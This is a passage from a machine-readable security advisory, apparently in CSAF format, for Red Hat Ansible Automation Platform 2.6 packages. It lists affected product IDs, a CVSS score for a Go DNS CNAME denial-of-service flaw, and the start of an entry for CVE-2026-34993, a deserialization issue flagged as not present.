"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "net: golang: Go net package: Denial of Service via long CNAME response in LookupCNAME"
},
{
"cve": "CVE-2026-34993",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2026-06-02T20:01:12.690409+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
